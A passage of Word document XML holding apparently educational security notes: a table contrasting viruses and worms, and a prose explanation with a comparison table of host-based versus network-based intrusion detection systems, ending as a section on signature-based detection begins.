      <w:tblGrid>
        <w:gridCol w:w="3116"/>
        <w:gridCol w:w="3117"/>
        <w:gridCol w:w="3752"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CA27E4" w14:paraId="7ED03A0A" w14:textId="77777777" w:rsidTr="00EB19E8">
        <w:trPr>
          <w:trHeight w:val="458"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="62F3DF58" w14:textId="77777777" w:rsidR="00CA27E4" w:rsidRDefault="00CA27E4" w:rsidP="00CA27E4">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="40CC0BAF" w14:textId="4A136F84" w:rsidR="00CA27E4" w:rsidRPr="00CA27E4" w:rsidRDefault="00CA27E4" w:rsidP="00CA27E4">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CA27E4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Virus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3752" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6EE914CF" w14:textId="30092882" w:rsidR="00CA27E4" w:rsidRPr="00CA27E4" w:rsidRDefault="00CA27E4" w:rsidP="00CA27E4">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CA27E4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Worm</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA27E4" w14:paraId="245B4071" w14:textId="77777777" w:rsidTr="00EB19E8">
        <w:trPr>
          <w:trHeight w:val="440"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="154F80C1" w14:textId="51B6AD7D" w:rsidR="00CA27E4" w:rsidRDefault="00CA27E4" w:rsidP="00CA27E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Replication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="260B2DFA" w14:textId="183F0FA0" w:rsidR="00CA27E4" w:rsidRDefault="00CA27E4" w:rsidP="00CA27E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Replicates by inserting its code into other files</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3752" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="15EF9CB3" w14:textId="43393857" w:rsidR="00CA27E4" w:rsidRDefault="00CA27E4" w:rsidP="00CA27E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Self-replicating program that spreads on its own.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA27E4" w14:paraId="7996EBA5" w14:textId="77777777" w:rsidTr="00EB19E8">
        <w:trPr>
          <w:trHeight w:val="440"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5BC3F87B" w14:textId="3B149475" w:rsidR="00CA27E4" w:rsidRDefault="00CA27E4" w:rsidP="00CA27E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Attachment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="082060D3" w14:textId="6E92FE9F" w:rsidR="00CA27E4" w:rsidRDefault="00CA27E4" w:rsidP="00CA27E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Requires attaching itself to a file or program</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3752" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5D2F45D5" w14:textId="0D8D66FF" w:rsidR="00CA27E4" w:rsidRDefault="00CA27E4" w:rsidP="00CA27E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Spreads through network vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA27E4" w14:paraId="1F5A55F4" w14:textId="77777777" w:rsidTr="00EB19E8">
        <w:trPr>
          <w:trHeight w:val="440"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2DDB0F08" w14:textId="060FA403" w:rsidR="00CA27E4" w:rsidRDefault="00CA27E4" w:rsidP="00CA27E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Spread</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="47DC6392" w14:textId="0B7D2068" w:rsidR="00CA27E4" w:rsidRDefault="00CA27E4" w:rsidP="00CA27E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Spreads through shared files, downloads, or infected websites</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3752" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6CE4C4AF" w14:textId="2575D50D" w:rsidR="00CA27E4" w:rsidRDefault="00CA27E4" w:rsidP="00CA27E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Spreads over a network without user interaction.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA27E4" w14:paraId="2733C807" w14:textId="77777777" w:rsidTr="00EB19E8">
        <w:trPr>
          <w:trHeight w:val="440"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="67A0262A" w14:textId="4528C9E7" w:rsidR="00CA27E4" w:rsidRDefault="00CA27E4" w:rsidP="00CA27E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Behavior</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="05E4FFC3" w14:textId="529B1F8C" w:rsidR="00CA27E4" w:rsidRDefault="00CA27E4" w:rsidP="00CA27E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Can cause various problems, from slowdowns to file deletion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3752" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3D34A1E6" w14:textId="53BADD3B" w:rsidR="00CA27E4" w:rsidRDefault="00CA27E4" w:rsidP="00CA27E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Can create botnets or steal sensitive information</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7DD857B0" w14:textId="4A969A3B" w:rsidR="00CA27E4" w:rsidRPr="00E01030" w:rsidRDefault="00CA27E4" w:rsidP="00CA27E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79EAB262" w14:textId="38731169" w:rsidR="00E01030" w:rsidRPr="00011028" w:rsidRDefault="00011028" w:rsidP="00011028">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00011028">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Difference between host-based IDS and network-based IDS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244525EA" w14:textId="77777777" w:rsidR="00702942" w:rsidRPr="00702942" w:rsidRDefault="00702942" w:rsidP="00702942">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240"/>
        <w:ind w:left="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00702942">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Host-based Intrusion Detection System (IDS) and Network-based Intrusion Detection System (IDS) are two types of security systems that are used to detect and respond to unauthorized activities or intrusions. Here's a detailed explanation of each with examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCC570E" w14:textId="77777777" w:rsidR="00702942" w:rsidRPr="00702942" w:rsidRDefault="00702942" w:rsidP="00702942">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="450"/>
          <w:tab w:val="left" w:pos="540"/>
        </w:tabs>
        <w:spacing w:before="240"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00702942">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Host-based IDS (HIDS): Host-based IDS focuses on monitoring and analyzing activities that occur on individual host systems, such as servers, workstations, or laptops. It operates by examining system logs, monitoring file integrity, and analyzing system calls and network connections specific to the host. HIDS typically operates using software agents installed on each host system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39346DC8" w14:textId="77777777" w:rsidR="00702942" w:rsidRPr="00702942" w:rsidRDefault="00702942" w:rsidP="00702942">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00702942">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Example: Let's say you have a server hosting a critical database. A host-based IDS installed on that server would monitor activities such as logins, file modifications, and network connections specific to that server. If an unauthorized user gains access to the server or attempts to modify critical files, the host-based IDS will generate an alert and trigger a response, such as sending notifications or blocking the suspicious activity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B646640" w14:textId="77777777" w:rsidR="00702942" w:rsidRPr="00702942" w:rsidRDefault="00702942" w:rsidP="00702942">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00702942">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Network-based IDS (NIDS): Network-based IDS focuses on monitoring and analyzing network traffic flowing through network devices, such as routers, switches, or firewalls. It examines network packets, headers, and protocols to detect and identify potential intrusions or suspicious </w:t>
      </w:r>
      <w:r w:rsidRPr="00702942">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>activities occurring within the network. NIDS can be deployed in a passive mode, where it monitors traffic without actively interfering, or in an inline mode, where it actively blocks or filters malicious traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B381DD" w14:textId="0B47686A" w:rsidR="00702942" w:rsidRDefault="00702942" w:rsidP="00702942">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00702942">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Example: Suppose you have a network with multiple interconnected devices, and you deploy a network-based IDS sensor on a specific segment of the network. The NIDS sensor continuously monitors the network traffic passing through that segment. If it detects a network packet with suspicious characteristics or a known signature of a known attack, it generates an alert and triggers an appropriate response, such as logging the event, blocking the suspicious traffic, or notifying the network administrator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7D69D2" w14:textId="5F5189C9" w:rsidR="00702942" w:rsidRDefault="00702942" w:rsidP="00702942">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="561FBE75" w14:textId="3FF0FE06" w:rsidR="00702942" w:rsidRDefault="00702942" w:rsidP="00702942">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>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Answer in table form:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4E0A4B" w14:textId="77777777" w:rsidR="00702942" w:rsidRDefault="00702942" w:rsidP="00702942">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9715" w:type="dxa"/>
        <w:tblInd w:w="-360" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3116"/>
        <w:gridCol w:w="3117"/>
        <w:gridCol w:w="3482"/>
      </w:tblGrid>
      <w:tr w:rsidR="00702942" w14:paraId="4EAF98D2" w14:textId="77777777" w:rsidTr="006A13D9">
        <w:trPr>
          <w:trHeight w:val="467"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4075BCC9" w14:textId="77777777" w:rsidR="00702942" w:rsidRDefault="00702942" w:rsidP="00702942">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7FD84155" w14:textId="550226CC" w:rsidR="00702942" w:rsidRPr="00702942" w:rsidRDefault="00702942" w:rsidP="00702942">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Host-based IDS (HIDS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3482" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="264F63AD" w14:textId="32B86984" w:rsidR="00702942" w:rsidRPr="00702942" w:rsidRDefault="00702942" w:rsidP="00702942">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Network-based IDS (NIDS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00702942" w14:paraId="640211D6" w14:textId="77777777" w:rsidTr="006A13D9">
        <w:trPr>
          <w:trHeight w:val="440"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="41869A3D" w14:textId="00990960" w:rsidR="00702942" w:rsidRDefault="00702942" w:rsidP="0070294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Focus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="63D7E9DA" w14:textId="443B2385" w:rsidR="00702942" w:rsidRDefault="00702942" w:rsidP="0070294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Monitors and analyzes activities on individual host systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3482" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6D334C46" w14:textId="44614E6B" w:rsidR="00702942" w:rsidRDefault="00A60D37" w:rsidP="0070294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Monitors and analyzes network traffic flowing through devices</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00702942" w14:paraId="25903BC9" w14:textId="77777777" w:rsidTr="006A13D9">
        <w:trPr>
          <w:trHeight w:val="440"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3E733B0C" w14:textId="1E844280" w:rsidR="00702942" w:rsidRDefault="00A60D37" w:rsidP="0070294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Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="65AD224F" w14:textId="4CB6F562" w:rsidR="00702942" w:rsidRDefault="00A60D37" w:rsidP="0070294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Specific to the host system being monitored</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3482" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3E0A2091" w14:textId="24A8EB48" w:rsidR="00702942" w:rsidRDefault="00A60D37" w:rsidP="0070294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Covers the entire network or specific network segments</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00702942" w14:paraId="05A1E543" w14:textId="77777777" w:rsidTr="006A13D9">
        <w:trPr>
          <w:trHeight w:val="440"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="29525115" w14:textId="4670A03C" w:rsidR="00702942" w:rsidRDefault="00A60D37" w:rsidP="0070294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Monitoring method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="55FD5BE8" w14:textId="31D7F15E" w:rsidR="00702942" w:rsidRDefault="00A60D37" w:rsidP="0070294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Examines system logs, file integrity, system calls, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3482" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="73BBC5D8" w14:textId="74A1F619" w:rsidR="00702942" w:rsidRDefault="00A60D37" w:rsidP="0070294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Analyzes network packets, headers, and protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00702942" w14:paraId="33223DD5" w14:textId="77777777" w:rsidTr="006A13D9">
        <w:trPr>
          <w:trHeight w:val="440"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2EE4DD22" w14:textId="707514DA" w:rsidR="00702942" w:rsidRDefault="00A60D37" w:rsidP="0070294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Deployment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1D04381F" w14:textId="7D76E40A" w:rsidR="00702942" w:rsidRDefault="00A60D37" w:rsidP="0070294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Software agents installed on each host system</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3482" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="45E9BDC6" w14:textId="792C8F95" w:rsidR="00702942" w:rsidRDefault="00A60D37" w:rsidP="0070294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Deployed on network devices such as routers or switches</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00702942" w14:paraId="0776D9B4" w14:textId="77777777" w:rsidTr="006A13D9">
        <w:trPr>
          <w:trHeight w:val="440"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="43AAD33E" w14:textId="7AD2CE56" w:rsidR="00702942" w:rsidRDefault="00A60D37" w:rsidP="0070294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Examples</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0B76DA94" w14:textId="67CFF4B9" w:rsidR="00702942" w:rsidRDefault="00A60D37" w:rsidP="0070294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Monitoring logins, file modifications on a server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3482" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="69AC0634" w14:textId="0925B387" w:rsidR="00702942" w:rsidRDefault="00A60D37" w:rsidP="0070294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Analyzing network packets for detecting known attacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2E89BD94" w14:textId="77777777" w:rsidR="00702942" w:rsidRPr="00702942" w:rsidRDefault="00702942" w:rsidP="00702942">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="-360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="316FC096" w14:textId="5512EC28" w:rsidR="00011028" w:rsidRDefault="00B362B8" w:rsidP="00B362B8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B362B8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Difference between signature-based IDS and abnormal-based IDS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423FF21E" w14:textId="77777777" w:rsidR="00EB0770" w:rsidRPr="00EB0770" w:rsidRDefault="00EB0770" w:rsidP="00EB0770">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB0770">
